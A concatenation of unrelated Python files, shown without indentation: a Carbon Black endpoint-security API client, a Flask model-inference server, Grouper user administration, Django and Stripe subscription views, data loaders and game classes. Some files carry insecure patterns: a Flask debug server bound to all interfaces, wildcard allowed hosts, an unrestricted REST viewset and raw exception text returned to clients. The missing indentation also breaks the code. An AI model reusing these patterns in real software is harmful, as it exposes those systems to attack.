with a 'SIEM' key generated in the Cb Endpoint Standard console.
:returns: list of dictionary objects representing the notifications, or an empty list if none available.
"""
res = self.get_object("/integrationServices/v3/notification")
return res.get("notifications", [])
# ---- Device API
def _raw_device_action(self, request):
"""
Invokes the API method for a device action.
:param dict request: The request body to be passed as JSON to the API method.
:return: The parsed JSON output from the request.
:raises ServerError: If the API method returns an HTTP error code.
"""
url = "/appservices/v6/orgs/{0}/device_actions".format(self.credentials.org_key)
resp = self.post_object(url, body=request)
if resp.status_code == 200:
return resp.json()
elif resp.status_code == 204:
return None
else:
raise ServerError(error_code=resp.status_code, message="Device action error: {0}".format(resp.content))
def _device_action(self, device_ids, action_type, options=None):
"""
Executes a device action on multiple device IDs.
:param list device_ids: The list of device IDs to execute the action on.
:param str action_type: The action type to be performed.
:param dict options: Options for the bulk device action. Default None.
"""
request = {"action_type": action_type, "device_id": device_ids}
if options:
request["options"] = options
return self._raw_device_action(request)
def _action_toggle(self, flag):
"""
Converts a boolean flag value into a "toggle" option.
:param boolean flag: The value to be converted.
:return: A dict containing the appropriate "toggle" element.
"""
if flag:
return {"toggle": "ON"}
else:
return {"toggle": "OFF"}
def device_background_scan(self, device_ids, scan):
"""
Set the background scan option for the specified devices.
:param list device_ids: List of IDs of devices to be set.
:param boolean scan: True to turn background scan on, False to turn it off.
"""
return self._device_action(device_ids, "BACKGROUND_SCAN", self._action_toggle(scan))
def device_bypass(self, device_ids, enable):
"""
Set the bypass option for the specified devices.
:param list device_ids: List of IDs of devices to be set.
:param boolean enable: True to enable bypass, False to disable it.
"""
return self._device_action(device_ids, "BYPASS", self._action_toggle(enable))
def device_delete_sensor(self, device_ids):
"""
Delete the specified sensor devices.
:param list device_ids: List of IDs of devices to be deleted.
"""
return self._device_action(device_ids, "DELETE_SENSOR")
def device_uninstall_sensor(self, device_ids):
"""
Uninstall the specified sensor devices.
:param list device_ids: List of IDs of devices to be uninstalled.
"""
return self._device_action(device_ids, "UNINSTALL_SENSOR")
def device_quarantine(self, device_ids, enable):
"""
Set the quarantine option for the specified devices.
:param list device_ids: List of IDs of devices to be set.
:param boolean enable: True to enable quarantine, False to disable it.
"""
return self._device_action(device_ids, "QUARANTINE", self._action_toggle(enable))
def device_update_policy(self, device_ids, policy_id):
"""
Set the current policy for the specified devices.
:param list device_ids: List of IDs of devices to be changed.
:param int policy_id: ID of the policy to set for the devices.
"""
return self._device_action(device_ids, "UPDATE_POLICY", {"policy_id": policy_id})
def device_update_sensor_version(self, device_ids, sensor_version):
"""
Update the sensor version for the specified devices.
:param list device_ids: List of IDs of devices to be changed.
:param dict sensor_version: New version properties for the sensor.
"""
return self._device_action(device_ids, "UPDATE_SENSOR_VERSION", {"sensor_version": sensor_version})
# ---- Alerts API
def alert_search_suggestions(self, query):
"""
Returns suggestions for keys and field values that can be used in a search.
:param query str: A search query to use.
:return: A list of search suggestions expressed as dict objects.
"""
query_params = {"suggest.q": query}
url = "/appservices/v6/orgs/{0}/alerts/search_suggestions".format(self.credentials.org_key)
output = self.get_object(url, query_params)
return output["suggestions"]
def _bulk_threat_update_status(self, threat_ids, status, remediation, comment):
"""
Update the status of alerts associated with multiple threat IDs, past and future.
:param list threat_ids: List of string threat IDs.
:param str status: The status to set for all alerts, either "OPEN" or "DISMISSED".
:param str remediation: The remediation state to set for all alerts.
:param str comment: The comment to set for all alerts.
"""
if not all(isinstance(t, str) for t in threat_ids):
raise ApiError("One or more invalid threat ID values")
request = {"state": status, "threat_id": threat_ids}
if remediation is not None:
request["remediation_state"] = remediation
if comment is not None:
request["comment"] = comment
url = "/appservices/v6/orgs/{0}/threat/workflow/_criteria".format(self.credentials.org_key)
resp = self.post_object(url, body=request)
output = resp.json()
return output["request_id"]
def bulk_threat_update(self, threat_ids, remediation=None, comment=None):
"""
Update the alert status of alerts associated with multiple threat IDs.
The alerts will be left in an OPEN state after this request.
:param threat_ids list: List of string threat IDs.
:param remediation str: The remediation state to set for all alerts.
:param comment str: The comment to set for all alerts.
:return: The request ID, which may be used to select a WorkflowStatus object.
"""
return self._bulk_threat_update_status(threat_ids, "OPEN", remediation, comment)
def bulk_threat_dismiss(self, threat_ids, remediation=None, comment=None):
"""
Dismiss the alerts associated with multiple threat IDs.
The alerts will be left in a DISMISSED state after this request.
:param threat_ids list: List of string threat IDs.
:param remediation str: The remediation state to set for all alerts.
:param comment str: The comment to set for all alerts.
:return: The request ID, which may be used to select a WorkflowStatus object.
"""
return self._bulk_threat_update_status(threat_ids, "DISMISSED", remediation, comment)
# ---- Enterprise EDR
def create(self, cls, data=None):
"""Creates a new model.
>>> feed = cb.create(Feed, feed_data)
:param cls: The model being created
:param data: The data to pre-populate the model with
:type data: dict(str, object)
:return: an instance of `cls`
"""
return cls(self, initial_data=data)
def validate_process_query(self, query):
"""Validates the given IOC query.
>>> cb.validate_query("process_name:chrome.exe") # True
:param str query: the query to validate
:return: whether or not the query is valid
:rtype: bool
"""
args = {"q": query}
url = "/api/investigate/v1/orgs/{}/processes/search_validation".format(
self.credentials.org_key
)
resp = self.get_object(url, query_parameters=args)
return resp.get("valid", False)
def convert_feed_query(self, query):
"""Converts a legacy CB Response query to a ThreatHunter query.
:param str query: the query to convert
:return: the converted query
:rtype: str
"""
args = {"query": query}
resp = self.post_object("/threathunter/feedmgr/v2/query/translate", args).json()
return resp.get("query")
@property
def custom_severities(self):
"""Returns a list of active :py:class:`ReportSeverity` instances
:rtype: list[:py:class:`ReportSeverity`]
"""
# TODO(ww): There's probably a better place to put this.
url = "/threathunter/watchlistmgr/v3/orgs/{}/reports/severity".format(
self.credentials.org_key
)
resp = self.get_object(url)
items = resp.get("results", [])
return [self.create(ReportSeverity, item) for item in items]
def fetch_process_queries(self):
"""Retrieves a list of queries, active or complete, known by
the ThreatHunter server.
:return: a list of query ids
:rtype: list(str)
"""
url = "/api/investigate/v1/orgs/{}/processes/search_jobs".format(
self.credentials.org_key
)
ids = self.get_object(url)
return ids.get("query_ids", [])
def process_limits(self):
"""Returns a dictionary containing API limiting information.
Example:
>>> cb.limits()
{u'status_code': 200, u'time_bounds': {u'upper': 1545335070095, u'lower': 1542779216139}}
:return: a dict of limiting information
:rtype: dict(str, str)
"""
url = "/api/investigate/v1/orgs/{}/processes/limits".format(
self.credentials.org_key
)
return self.get_object(url)
|
from shooter.config import LANDSCAPE_PALM
from shooter.game_object.landscape import Landscape
class Palm(Landscape):
"""Класс пальмы"""
def __init__(self, x, y, image=LANDSCAPE_PALM):
super().__init__(x, y, image)
|
import torch
import numpy as np
import os
import cv2
from LapNet import LAPNet
from create_dataset import createDataset
from torch.nn import DataParallel
from collections import OrderedDict
from torch.nn.parameter import Parameter
import json
import base64
import numpy as np
from flask import Flask, request, Response
app = Flask(__name__)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
ModelName = "LapNet_chkpt_better_epoch3978_GPU0_line.pth"
# ModelName = "LapNet_chkpt_better_epoch1890_GPU0_chLi_line.pth"
DetectMode = "line"
Port = "9360"
class LapNet_Test:
def __init__(self, model_name, detect_mode):
# torch.cuda.set_device(args.gpu_idx)
torch.cuda.set_device(0)
# self.INPUT_CHANNELS = 3
# self.OUTPUT_CHANNELS = 2
# self.LEARNING_RATE = args.lr #1e-5
# self.BATCH_SIZE = args.batch_size #20
# self.NUM_EPOCHS = args.epoch #100
# self.LOG_INTERVAL = 20
# self.INS_CH = 32
# self.SIZE = [args.img_size[0], args.img_size[1]] #[224, 224]
# self.NUM_WORKERS = args.num_workers #20
self.INPUT_CHANNELS = 3
self.OUTPUT_CHANNELS = 2
self.LEARNING_RATE = 3e-4
self.BATCH_SIZE = 32
self.NUM_EPOCHS = 10000000000000
self.LOG_INTERVAL = 20
self.INS_CH = 32
self.SIZE = [1024,512]
self.NUM_WORKERS = 32
self.model_name = model_name
self.detect_mode = detect_mode
self.root_path = '../../../thirdparty/lapnet-gpu'
self.model = LAPNet(input_ch=self.INPUT_CHANNELS, output_ch=self.OUTPUT_CHANNELS,internal_ch = 8).cuda()
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.LEARNING_RATE, betas=(0.9, 0.99), amsgrad=True)
chkpt_filename = self.root_path + '/trained_model/'+ self.model_name
if not os.path.exists(self.root_path + '/trained_model'):
os.mkdir(self.root_path + '/trained_model')
if os.path.isfile(chkpt_filename):
checkpoint = torch.load(chkpt_filename)
self.start_epoch = checkpoint['epoch']
self.optimizer.load_state_dict(checkpoint['optimizer'])
self.model.load_state_dict(checkpoint['net'])
self.load_state_dict(self.model, self.state_dict(self.model))
def state_dict(self, model, destination=None, prefix='', keep_vars=False):
own_state = model.module if isinstance(model, torch.nn.DataParallel) \
else model
if destination is None:
destination = OrderedDict()
for name, param in own_state._parameters.items():
if param is not None:
destination[prefix + name] = param if keep_vars else param.data
for name, buf in own_state._buffers.items():
if buf is not None:
destination[prefix + name] = buf
for name, module in own_state._modules.items():
if module is not None:
self.state_dict(module, destination, prefix + name + '.', keep_vars=keep_vars)
return destination
def load_state_dict(self, model, state_dict, strict=True):
own_state = model.module.state_dict() if isinstance(model, torch.nn.DataParallel) \
else model.state_dict()
for name, param in state_dict.items():
if name in own_state:
if isinstance(param, Parameter):
# backwards compatibility for serialized parameters
param = param.data
try:
own_state[name].copy_(param)
except Exception:
raise RuntimeError('While copying the parameter named {}, '
'whose dimensions in the model are {} and '
'whose dimensions in the checkpoint are {}.'
.format(name, own_state[name].size(), param.size()))
elif strict:
raise KeyError('unexpected key "{}" in state_dict'
.format(name))
if strict:
missing = set(own_state.keys()) - set(state_dict.keys())
if len(missing) > 0:
raise KeyError('missing keys in state_dict: "{}"'.format(missing))
lapnet_test = LapNet_Test(ModelName, DetectMode)
lapnet_test.model.eval()
@app.route("/predict", methods=["POST"])
def predict():
data= request.get_data()
data_json = json.loads(data)
img_b64encode = bytes(data_json["Image"], encoding="utf-8")
img_b64decode = base64.b64decode(img_b64encode)
img_array = np.frombuffer(img_b64decode, np.uint8)
image = cv2.imdecode(img_array, cv2.COLOR_BGR2RGB)
train_dataset = createDataset("", size=lapnet_test.SIZE, image=image)
train_dataloader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=24, pin_memory=True,
shuffle=False, num_workers=0)
img = list(enumerate(train_dataloader))[0][1]
img_tensor = torch.tensor(img).cuda()
sem_pred = lapnet_test.model(img_tensor)
seg_map = torch.squeeze(sem_pred, 0).cpu().detach().numpy()
seg_show = seg_map[1]
_, seg_show2 = cv2.threshold(seg_show + 1, 0, 0, cv2.THRESH_TOZERO)
seg_show2 = cv2.normalize(seg_show2, seg_show2, 0, 1, cv2.NORM_MINMAX)
seg_show2 = cv2.convertScaleAbs(seg_show2, seg_show2, 255)
result_img = cv2.applyColorMap(seg_show2, cv2.COLORMAP_MAGMA)
output_img_array = cv2.imencode(".jpg", result_img)[1]
output_img_b64encode = str(base64.b64encode(output_img_array))[2:-1]
image_output_json = {}
image_output_json["OutputImage"] = output_img_b64encode
return image_output_json
if __name__ == "__main__":
app.run(host="0.0.0.0", port=Port,debug=True)
|
import dolfin as df
import numpy as np
def make_line_mesh(vertices, cells=None, close_path=False):
'''Mesh from data by MeshEditor'''
assert vertices.ndim == 2
# Path mesh
if cells is None:
nvertices = len(vertices)
if not close_path:
cells = np.array([(i, i+1) for i in range(nvertices-1)], dtype='uintp')
else:
cells = np.array([(i, (i+1)%nvertices) for i in range(nvertices)], dtype='uintp')
return make_line_mesh(vertices, cells)
ncells, nvtx_per_cell = cells.shape
assert nvtx_per_cell == 2
tdim = 1
nvertices, gdim = vertices.shape
assert gdim > 1
mesh = df.Mesh()
editor = df.MeshEditor()
editor.open(mesh, 'interval', tdim, gdim)
editor.init_vertices(nvertices)
editor.init_cells(ncells)
for vi, x in enumerate(vertices): editor.add_vertex(vi, x)
for ci, c in enumerate(np.asarray(cells, dtype='uintp')): editor.add_cell(ci, c)
editor.close()
return mesh
|
import logging
import sys
from typing import TYPE_CHECKING
from grouper import public_key
from grouper.ctl.base import CtlCommand
from grouper.ctl.util import ensure_valid_username, make_session
from grouper.models.audit_log import AuditLog
from grouper.models.user import User
from grouper.plugin.exceptions import PluginRejectedDisablingUser
from grouper.role_user import disable_role_user, enable_role_user
from grouper.usecases.convert_user_to_service_account import ConvertUserToServiceAccountUI
from grouper.user import disable_user, enable_user, get_all_users
from grouper.user_metadata import set_user_metadata
if TYPE_CHECKING:
from argparse import ArgumentParser, Namespace
from grouper.usecases.factory import UseCaseFactory
@ensure_valid_username
def user_command(args):
# type: (Namespace) -> None
session = make_session()
if args.subcommand == "create":
for username in args.username:
user = User.get(session, name=username)
if not user:
logging.info("{}: No such user, creating...".format(username))
user = User.get_or_create(session, username=username, role_user=args.role_user)
session.commit()
else:
logging.info("{}: Already exists. Doing nothing.".format(username))
return
elif args.subcommand == "disable":
for username in args.username:
user = User.get(session, name=username)
if not user:
logging.info("{}: No such user. Doing nothing.".format(username))
elif not user.enabled:
logging.info("{}: User already disabled. Doing nothing.".format(username))
else:
logging.info("{}: User found, disabling...".format(username))
try:
if user.role_user:
disable_role_user(session, user)
else:
disable_user(session, user)
AuditLog.log(
session,
user.id,
"disable_user",
"(Administrative) User disabled via grouper-ctl",
on_user_id=user.id,
)
session.commit()
except PluginRejectedDisablingUser as e:
logging.error(e.message)
return
elif args.subcommand == "enable":
for username in args.username:
user = User.get(session, name=username)
if not user:
logging.info("{}: No such user. Doing nothing.".format(username))
elif user.enabled:
logging.info("{}: User not disabled. Doing nothing.".format(username))
else:
logging.info("{}: User found, enabling...".format(username))
if user.role_user:
enable_role_user(
session, user, preserve_membership=args.preserve_membership, user=user
)
else:
enable_user(session, user, user, preserve_membership=args.preserve_membership)
AuditLog.log(
session,
user.id,
"enable_user",
"(Administrative) User enabled via grouper-ctl",
on_user_id=user.id,
)
session.commit()
return
# "add_public_key" and "set_metadata"
user = User.get(session, name=args.username)
if not user:
logging.error("{}: No such user. Doing nothing.".format(args.username))
return
# User must exist at this point.
if args.subcommand == "set_metadata":
logging.info(
"Setting %s metadata: %s=%s", args.username, args.metadata_key, args.metadata_value
)
if args.metadata_value == "":
args.metadata_value = None
set_user_metadata(session, user.id, args.metadata_key, args.metadata_value)
session.commit()
elif args.subcommand == "add_public_key":
logging.info("Adding public key for user")
try:
pubkey = public_key.add_public_key(session, user, args.public_key)
except public_key.DuplicateKey:
logging.error("Key already in use")
return
except public_key.PublicKeyParseError:
logging.error("Public key appears to be invalid")
return
AuditLog.log(
session,
user.id,
"add_public_key",
"(Administrative) Added public key: {}".format(pubkey.fingerprint_sha256),
on_user_id=user.id,
)
class UserCommand(CtlCommand, ConvertUserToServiceAccountUI):
"""Commands to modify users."""
@staticmethod
def add_arguments(parser):
# type: (ArgumentParser) -> None
parser.add_argument(
"-a",
"--actor",
required=False,
dest="actor_name",
help=(
"Name of the entity performing this action."
" Must be a valid Grouper human or service account."
),
)
subparser = parser.add_subparsers(dest="subcommand")
user_key_parser = subparser.add_parser("add_public_key", help="Add public key to user")
user_key_parser.add_argument("username")
user_key_parser.add_argument("public_key")
user_convert_parser = subparser.add_parser(
"convert_to_service_account", help="Convert to service account"
)
user_convert_parser.add_argument(
"--owner", required=True, help="Name of group to own the service account"
)
user_convert_parser.add_argument("username")
user_create_parser = subparser.add_parser("create", help="Create a new user account")
user_create_parser.add_argument("username", nargs="+")
user_create_parser.add_argument(
"--role-user",
default=False,
action="store_true",
help="If given, identifies user as a role user.",
)
user_disable_parser = subparser.add_parser("disable", help="Disable a user account")
user_disable_parser.add_argument("username", nargs="+")
user_enable_parser = subparser.add_parser("enable", help="(Re-)enable a user account")
user_enable_parser.add_argument("username", nargs="+")
user_enable_parser.add_argument(
"--preserve-membership",
default=False,
action="store_true",
help="Unless provided, scrub all group memberships when re-enabling user.",
)
subparser.add_parser("list", help="List all users and their account statuses")
user_set_metadata_parser = subparser.add_parser(
"set_metadata", help="Set metadata on user"
)
user_set_metadata_parser.add_argument("username")
user_set_metadata_parser.add_argument("metadata_key")
user_set_metadata_parser.add_argument("metadata_value")
def __init__(self, usecase_factory):
# type: (UseCaseFactory) -> None
self.usecase_factory = usecase_factory
def converted_user_to_service_account(self, user, owner):
# type: (str, str) -> None
logging.info("converted user %s to service account owned by %s", user, owner)
def convert_user_to_service_account_failed_permission_denied(self, user):
# type: (str) -> None
logging.critical("not permitted to convert user %s to service account", user)
sys.exit(1)
def convert_user_to_service_account_failed_user_is_in_groups(self, user):
# type: (str) -> None
logging.critical("user %s cannot be converted while a member of any groups", user)
sys.exit(1)
def run(self, args):
# type: (Namespace) -> None
if args.subcommand == "convert_to_service_account":
usecase = self.usecase_factory.create_convert_user_to_service_account_usecase(
args.actor_name, self
)
usecase.convert_user_to_service_account(args.username, args.owner)
elif args.subcommand == "list":
session = make_session()
all_users = get_all_users(session)
for user in all_users:
user_enabled = "enabled" if user.enabled else "disabled"
logging.info("{} has status {}".format(user.name, user_enabled))
return
else:
user_command(args)
|
from catello.settings.base import *
ALLOWED_HOSTS = ["*"]
LOGLEVELDEBUG=True
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'catello_bot',
'USER': 'bruand',
'PASSWORD': None,
'HOST': 'localhost',
'PORT': 5432,
}
} |
import os
import numpy as np
import pandas as pd
# Paths to text files
ROOT_DIR = os.path.join(os.path.dirname(__file__), '..')
DATA_DIR = os.path.join(ROOT_DIR, 'data')
DATA_PATH = os.path.join(DATA_DIR, 'data.txt')
TRAIN_DATA_PATH = os.path.join(DATA_DIR, 'train.txt')
TEST_DATA_PATH = os.path.join(DATA_DIR, 'test.txt')
MOVIES_PATH = os.path.join(DATA_DIR, 'movies.txt')
PLOTS_DIR = os.path.join(ROOT_DIR, 'plots')
# Text file columns
MOVIES_COLUMNS = [
'movie_id',
'title',
'unknown',
'action',
'adventure',
'animation',
'childrens',
'comedy',
'crime',
'documentary',
'drama',
'fantasy',
'film_noir',
'horror',
'musical',
'mystery',
'romance',
'sci_fi',
'thriller',
'war',
'western'
]
DATA_COLUMNS = ['user_id', 'movie_id', 'rating']
def reindex(df, columns=['user_id', 'movie_id']):
df = df.copy()
for col in columns:
if col in df:
df[col] -= 1
return df
def load_data():
"""Load the entire (train + test) dataset as a Pandas DataFrame."""
df = pd.read_csv(DATA_PATH, names=DATA_COLUMNS, delimiter='\t')
return reindex(df)
def load_train_data():
"""Load the train dataset as a Pandas DataFrame."""
df = pd.read_csv(TRAIN_DATA_PATH, names=DATA_COLUMNS, delimiter='\t')
return reindex(df)
def load_test_data():
"""Load the test dataset as a Pandas DataFrame."""
df = pd.read_csv(TEST_DATA_PATH, names=DATA_COLUMNS, delimiter='\t')
return reindex(df)
def load_movies():
"""Load the movie info as a Pandas DataFrame."""
df = pd.read_csv(MOVIES_PATH, names=MOVIES_COLUMNS, delimiter='\t')
return reindex(df)
def add_missing_ratings(df, movie_ids, user_id=None):
""""Add a single rating of 2.5 to all movies with no ratings in the
given dataframe. The rating is made by the provided user id or the next
user id."""
user_id = user_id if user_id is not None else np.max(df.user_id) + 1
missing = set(movie_ids) - set(df.movie_id.values)
df_add = pd.DataFrame(
[[user_id, movie_id, 2.5] for movie_id in missing],
columns=df.columns
)
return pd.concat((df, df_add))
def save_fig(fig, name):
fig.savefig(os.path.join(PLOTS_DIR, name), dpi=300, bbox_inches='tight')
|
from rest_framework import serializers
from rest_framework.routers import DefaultRouter
from rest_framework.viewsets import ModelViewSet
from hc.api.models import Channel
class ChannelSerializer(serializers.ModelSerializer):
class Meta:
model = Channel
fields = ('code', 'kind', 'value', 'user', 'created', 'checks')
class ChannelsViewSet(ModelViewSet):
queryset = Channel.objects.all().order_by('-created')
serializer_class = ChannelSerializer
search_fields = ('kind', 'user',)
filter_fields = ('kind', 'user',)
channels_router = DefaultRouter()
channels_router.register(r'channels', ChannelsViewSet)
|
from django.shortcuts import (render, redirect, reverse,
get_object_or_404, HttpResponse)
from django.contrib import messages
from django.views.decorators.http import require_POST
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.utils import timezone
from .forms import SubscriptionForm
from .models import Package, Subscription, SubscriptionCount
from .contexts import subscription_cart_contents
from members.models import Member
import stripe
import json
import datetime
@require_POST
def cache_checkout_data(request):
try:
pid = request.POST.get('client_secret').split('_secret')[0]
stripe.api_key = settings.STRIPE_SECRET_KEY
stripe.PaymentIntent.modify(pid, metadata={
'subscription_cart': json.dumps(request.session.get('subscription_cart', {})),
'save_member_info': request.POST.get('save_member_info'),
'username': request.user,
})
return HttpResponse(status=200)
except Exception as e:
messages.error(request, 'There was an issue processing '
'your payment. Please try again later.')
return HttpResponse(content=e, status=400)
def subscribe_page(request):
"""This view renders the different subscription packages a user can buy."""
packages = Package.objects.all()
if request.user.is_authenticated:
member = Member.objects.filter(user=request.user)
if member:
messages.error(request, 'You already have a subscription.')
return redirect(reverse('home'))
else:
context = {
'packages': packages,
'member': member,
}
return render(request, 'subscribe/subscribe.html', context)
context = {
'packages': packages,
}
return render(request, 'subscribe/subscribe.html', context)
@login_required
def add_package_to_cart(request, package_id):
package = get_object_or_404(Package, pk=package_id)
quantity = 1
redirect_url = request.POST.get('redirect_url')
subscription_cart = request.session.get('subscription_cart', {})
if subscription_cart:
# This block handles the event that a user selects one
# subscription packages, then goes back and selects a
# different package. Each time the user selects a package
# the cart is emptied before the new one is added so the
# user is not charged for multiple subscriptions
subscription_cart.clear()
if package_id in list(subscription_cart.keys()):
subscription_cart[package_id] += quantity
else:
subscription_cart[package_id] = quantity
else:
if package_id in list(subscription_cart.keys()):
subscription_cart[package_id] += quantity
else:
subscription_cart[package_id] = quantity
request.session['subscription_cart'] = subscription_cart
return redirect(reverse('get_subscription', args=[package.id]))
@login_required
def get_subscription(request, package_id):
"""This view renders the subscription form for the user to fill out"""
"""before completing payment. Credit to ckz8780 / Boutique Ado."""
stripe_public_key = settings.STRIPE_PUBLIC_KEY
stripe_secret_key = settings.STRIPE_SECRET_KEY
member = Member.objects.filter(user=request.user)
if member:
messages.error(request, 'You already have a subscription.')
return redirect(reverse('home'))
package = get_object_or_404(Package, pk=package_id)
if request.method == "POST":
subscription_cart = request.session.get('subscription_cart', {})
form_data = {
'full_name': request.POST['full_name'],
'email_address': request.POST['email_address'],
'phone_number': request.POST['phone_number'],
'cardholder_name': request.POST['cardholder_name'],
'address_line1': request.POST['address_line1'],
'address_line2': request.POST['address_line2'],
'town_or_city': request.POST['town_or_city'],
'county_or_region': request.POST['county_or_region'],
'postcode': request.POST['postcode'],
'country': request.POST['country'],
}
subscription_form = SubscriptionForm(form_data)
if subscription_form.is_valid():
subscription = subscription_form.save(commit=False)
member = Member.objects.create(user=request.user)
pid = request.POST.get('client_secret').split('_secret')[0]
subscription.stripe_pid = pid
subscription.package_in_cart = json.dumps(subscription_cart)
subscription.save()
member.subscription_package = package
if package.id == 3:
member.is_vip = True
member.save()
member.save()
for package_id, package_data in subscription_cart.items():
try:
package = Package.objects.get(id=package_id)
if isinstance(package_data, int):
subscription_count = SubscriptionCount(
subscription=subscription,
package=package,
quantity=package_data,
)
subscription_count.save()
else:
# Subscription packages do not have sizes or any other
# differentiating data, so package_data should always
# return an integer. In the unlikely event that it
# doesn't, the app throws this error, resets the cart
# and redirects the user
messages.error(request, 'We were unable to locate '
'the subscription in our database. '
'Please try again later.')
subscription.delete()
return redirect(reverse('subscribe_page'))
except Package.DoesNotExist:
messages.error(request, 'We were unable to locate '
'the subscription in our database. '
'Please try again later.')
subscription.delete()
return redirect(reverse('subscribe_page'))
request.session['save_member_info'] = 'save-member-info' in request.POST
return redirect(reverse('subscription_confirmation',
args=[subscription.subscription_id]))
else:
messages.error(request, 'There was an error submitting the form. '
'Please ensure that you have filled out all fields '
'correctly.')
else:
subscription_cart = request.session.get('subscription_cart', {})
if not subscription_cart:
print('hello')
messages.error(request, "You didn't select a subscription")
return redirect(reverse('subscribe_page'))
current_cart = subscription_cart_contents(request)
grand_total = current_cart['grand_total']
stripe_total = round(grand_total * 100)
stripe.api_key = stripe_secret_key
intent = stripe.PaymentIntent.create(
amount=stripe_total,
currency=settings.STRIPE_CURRENCY,
)
if request.user.is_authenticated:
try:
member = Member.objects.get(user=request.user)
subscription_form = SubscriptionForm(initial={
'full_name': member.user.get_full_name(),
'email_address': member.user.email,
'phone_number': member.default_phone_number,
'cardholder_name': member.user.get_full_name(),
'address_line1': member.default_address_line1,
'address_line2': member.default_address_line2,
'town_or_city': member.default_town_or_city,
'county_or_region': member.default_county_or_region,
'postcode': member.default_postcode,
'country': member.default_country,
})
except Member.DoesNotExist:
subscription_form = SubscriptionForm()
else:
messages.error(request, 'You must have an account to get a '
'subscription.')
return redirect(reverse('home'))
if not stripe_public_key:
messages.warning(request, 'Your Stripe public key is missing. Please '
'ensure that you have set this in your environment.')
template = 'subscribe/get_subscription.html'
context = {
'subscription_form': subscription_form,
'package': package,
'stripe_public_key': stripe_public_key,
'client_secret': intent.client_secret,
}
return render(request, template, context)
@login_required
def subscription_confirmation(request, subscription_id):
"""Confirms a successful subscription once user has submitted the form"""
save_member_info = request.session.get('save_member_info')
subscription = get_object_or_404(Subscription, subscription_id=subscription_id)
member = Member.objects.get(user=request.user)
subscription.member = member
subscription.save()
if save_member_info:
member_data = {
'subscription_package': subscription.subscription_package,
'default_email_address': subscription.email_address,
'default_phone_number': subscription.phone_number,
'default_address_line1': subscription.address_line1,
'default_address_line2': subscription.address_line2,
'default_town_or_city': subscription.town_or_city,
'default_county_or_region': subscription.county_or_region,
'default_postcode': subscription.postcode,
'default_country': subscription.country,
}
membership_form = MembershipForm(member_data, instance=member)
if membership_form.is_valid():
membership_form.save()
messages.success(request, f'Your request was processed successfully. \
Your subscription ID is {subscription_id}. A confirmation e-mail \
will be sent to {subscription.email_address}.')
template = 'subscribe/subscription_confirmation.html'
context = {
'subscription': subscription,
'member': member,
}
return render(request, template, context)
@login_required
def cancel_subscription(request, user):
"""This view cancels a user's subscription by detaching its user"""
member = get_object_or_404(Member, user=request.user)
member.delete()
messages.success(request, 'Your subscription was successfully '
'cancelled. You will no longer be charged for '
'this package.')
return redirect(reverse('home'))
|
#Interphase - Copyright (C) 2009 James Garnon <https://gatc.ca/>
#Released under the MIT License <https://opensource.org/licenses/MIT>
from __future__ import division
import os
try:
_set = set
except NameError:
from sets import Set as _set
from interphase.env import engine
__docformat__ = 'restructuredtext'
class Text(object):
"""
Receives text to display on surface.
Arguments include the target surface for text rendering, font_type is a list of alternate font names, and font_size is the font size.
"""
_font = {}
_cache = {}
def __init__(self, surface, font_type=None, font_size=None):
self.screen = surface
x, y = self.screen.get_size()
self.dimension = {'x':x, 'y':y}
self.message = None
self.messages = []
if font_size:
self.font_size = int(font_size)
else:
self.font_size = 10
if isinstance(font_type, str):
font_type = [font_type]
if not Text._font:
engine.font.init()
font = None
if font_type:
font_type = ','.join(font_type)
if font_type.startswith('file:'):
font = font_type[5:].strip()
if not os.path.exists(font):
print('Font not found: %s' % font)
font = None
else:
font = engine.font.match_font(font_type)
if not font:
font_type = 'verdana, tahoma, bitstreamverasans, freesans, arial'
font = engine.font.match_font(font_type)
if not font:
font = engine.font.get_default_font()
font_type = font
Text._font['default'] = font
Text._font['defaults'] = font_type
Text._font[font] = { self.font_size:engine.font.Font(font,self.font_size) }
font_type = None
if font_type:
font_type = ','.join(font_type)
if font_type != Text._font['defaults']:
if font_type.startswith('file:'):
font_type = font_type[5:].strip()
if not os.path.exists(font_type):
print('Font not found: %s' % font_type)
font_type = None
else:
font_type = engine.font.match_font(font_type)
if font_type:
if font_type not in Text._font:
Text._font[font_type] = { self.font_size:engine.font.Font(font_type,self.font_size) }
else:
font_type = Text._font['default']
else:
font_type = Text._font['default']
else:
font_type = Text._font['default']
if self.font_size not in Text._font[font_type]:
Text._font[font_type][self.font_size] = engine.font.Font(font_type,self.font_size)
self.font_type = font_type
self.font = Text._font[self.font_type]
self.x = 0
self.y = 0
self.center = False
self.font_color = (255,0,0)
self.font_bgcolor = (0,0,0)
self.split_text = False
self.linesize = self.font[self.font_size].get_linesize()
self.margin = {'t':0, 'r':0, 'b':0, 'l':0}
self.multiline = False
self.cache = None
self.cache_key = None
def __call__(self, surface='default'):
"""Writes text to surface."""
if surface == 'default':
self.surface = self.screen
else:
self.surface = surface
self.update()
return self.surface
def render(self, surface='default'):
"""Writes text to surface."""
if surface == 'default':
self.surface = self.screen
else:
self.surface = surface
self.update()
return self.surface
def add(self,*message_append):
"""Add to text."""
for item in message_append:
self.message = str(item)
self.messages.append(self.message)
def set_position(self, position, center=False):
"""Set position to write text."""
x, y = position
if x < self.dimension['x'] and y < self.dimension['y']:
self.x = x
self.y = y
if center:
self.center = True
return True
else:
return False
def set_text_alignment(self, setting):
"""Set text alignment. Setting is 'center' or 'left'."""
if setting == 'center':
self.center = True
elif setting == 'left':
self.center = False
def set_margin(self, margin):
"""Set text margin."""
try:
self.margin['t'], self.margin['r'], self.margin['b'], self.margin['l'] = margin
except TypeError:
self.margin['t'] = self.margin['r'] = self.margin['b'] = self.margin['l'] = margin
def set_multiline(self, multiline=True):
"""Set multiline text."""
self.multiline = multiline
def set_font(self, font_type, default=False):
"""Set font of text."""
if isinstance(font_type, str):
font_type = [font_type]
font_type = ','.join(font_type)
if font_type == 'default':
font_type = Text._font['default']
self.font = Text._font[font_type]
self.font_type = font_type
elif font_type != Text._font['defaults']:
if font_type.startswith('file:'):
font = font_type[5:].strip()
if not os.path.exists(font):
print('Font not found: %s' % font)
font = None
else:
font = engine.font.match_font(font_type)
if font:
if font not in Text._font:
Text._font[font] = { self.font_size:engine.font.Font(font,self.font_size) }
self.font = Text._font[font]
self.font_type = font
if default:
Text._font['default'] = font
Text._font['defaults'] = font_type
self.linesize = self.font[self.font_size].get_linesize()
